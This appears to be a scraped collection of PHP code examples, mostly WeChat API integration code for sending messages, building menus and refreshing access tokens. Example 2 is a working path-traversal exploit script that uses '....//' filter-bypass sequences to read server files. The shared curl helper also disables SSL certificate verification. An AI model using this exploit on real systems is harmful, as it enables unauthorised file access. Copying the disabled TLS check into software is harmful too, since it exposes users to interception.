示例#1
0
    function wx_message($uid, $title, $description, $url, $picurl)
    {
        $uid = intval($uid);
        $Token = getToken($this->config);
        $WxUrl = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=' . $Token;
        $Touser = '******';
        $Data = '{
			"touser":"******",
			"msgtype":"news",
			"news":{
				"articles": [
				 {
					 "title":"' . iconv('gbk', 'utf-8', $title) . '",
					 "description":"' . iconv('gbk', 'utf-8', $description) . '",
					 "url":"' . $url . '",
					 "picurl":"' . $picurl . '"
				 }
				]
			}
		}';
        $return = CurlPost($WxUrl, $Data);
    }
示例#2
0
$url = $argv[1];
$data = $argv[2];
$needle = $argv[3];
/** Curl function with appropriate adjustments **/
function CurlPost($url = 'localhost', $data = array())
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 50);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    return curl_exec($ch);
    curl_close($ch);
}
list($param, $file) = explode(':', $data);
$FilterBypassing = '....//';
for ($i = 0; $i < 10; $i++) {
    $DataToPost[$param] = $FilterBypassing . $file;
    $response = CurlPost($url, $DataToPost);
    if (strstr($response, $needle) !== FALSE) {
        echo $response;
        echo "\n\nExploited successfully!\n";
        echo 'Payload: ', $DataToPost[$param], "\n\n\n";
        die;
    }
    $FilterBypassing .= '....//';
}
示例#3
0
 public function creat_action()
 {
     $list = $this->obj->DB_select_all("wxnav", "1 ORDER BY `keyid` ASC,`sort` ASC");
     if (is_array($list)) {
         foreach ($list as $value) {
             if ($value['keyid'] == '0') {
                 $navlist[$value['id']] = $value;
             }
         }
         foreach ($list as $val) {
             foreach ($navlist as $key => $v) {
                 if ($v['id'] == $val['keyid']) {
                     $navlist[$key]['list'][] = $val;
                 }
             }
         }
         $CreatNav = '{"button":[';
         $i = 0;
         foreach ($navlist as $key => $value) {
             if ($i < 1) {
                 $CreatNav .= '{"name":"' . iconv('gbk', 'utf-8', $value['name']) . '","sub_button":[';
             } else {
                 $CreatNav .= ',{"name":"' . iconv('gbk', 'utf-8', $value['name']) . '","sub_button":[';
             }
             $i++;
             $NavInfo = array();
             if (is_array($value['list']) && !empty($value['list'])) {
                 foreach ($value['list'] as $k => $v) {
                     if ($k > 0) {
                         $CreatNav .= ',';
                     }
                     if ($v['type'] == 'click') {
                         $CreatNav .= '{"type":"click","name":"' . iconv('gbk', 'utf-8', $v['name']) . '","key":"' . iconv('gbk', 'utf-8', $v['key']) . '"}';
                     } elseif ($v['type'] == 'view') {
                         $CreatNav .= '{"type":"view","name":"' . iconv('gbk', 'utf-8', $v['name']) . '","url":"' . $v['url'] . '"}';
                     }
                 }
             }
             $CreatNav .= ']}';
         }
         $CreatNav .= ']}';
         $Token = getToken($this->config);
         $DelUrl = 'https://api.weixin.qq.com/cgi-bin/menu/delete?access_token=' . $Token;
         CurlPost($DelUrl);
         $Url = "https://api.weixin.qq.com/cgi-bin/menu/create?access_token=" . $Token;
         $result = CurlPost($Url, $CreatNav);
         $Info = json_decode($result);
         if ($Info->errcode == '0' || $Info->errmsg == 'ok') {
             echo 1;
             die;
         } else {
             echo 2;
             die;
         }
     }
 }
示例#4
0
function getToken($config)
{
    $Token = $config['token'];
    $TokenTime = $config['token_time'];
    $NowTime = time();
    if ($NowTime - $TokenTime > 7000) {
        $Appid = $config['wx_appid'];
        $Appsecert = $config['wx_appsecret'];
        $Url = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=' . $Appid . '&secret=' . $Appsecert;
        $CurlReturn = CurlPost($Url);
        $Token = json_decode($CurlReturn);
        $config['token'] = $Token->access_token;
        $config['token_time'] = time();
        made_web(PLUS_PATH . "config.php", ArrayToString($config), "config");
        return $config['token'];
    } else {
        return $Token;
    }
}
示例#5
0
 function sendWxTemplate($wxid, $tempid, $url, $data)
 {
     global $config;
     $Token = getToken($config);
     $wxUrl = 'https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=' . $Token;
     $templateDate = array("touser" => $wxid, "template_id" => $tempid, "url" => $url, "topcolor" => "#FF0000", "data" => $data);
     $CurlReturn = CurlPost($wxUrl, json_encode($templateDate));
     $UserInfo = json_decode($CurlReturn);
 }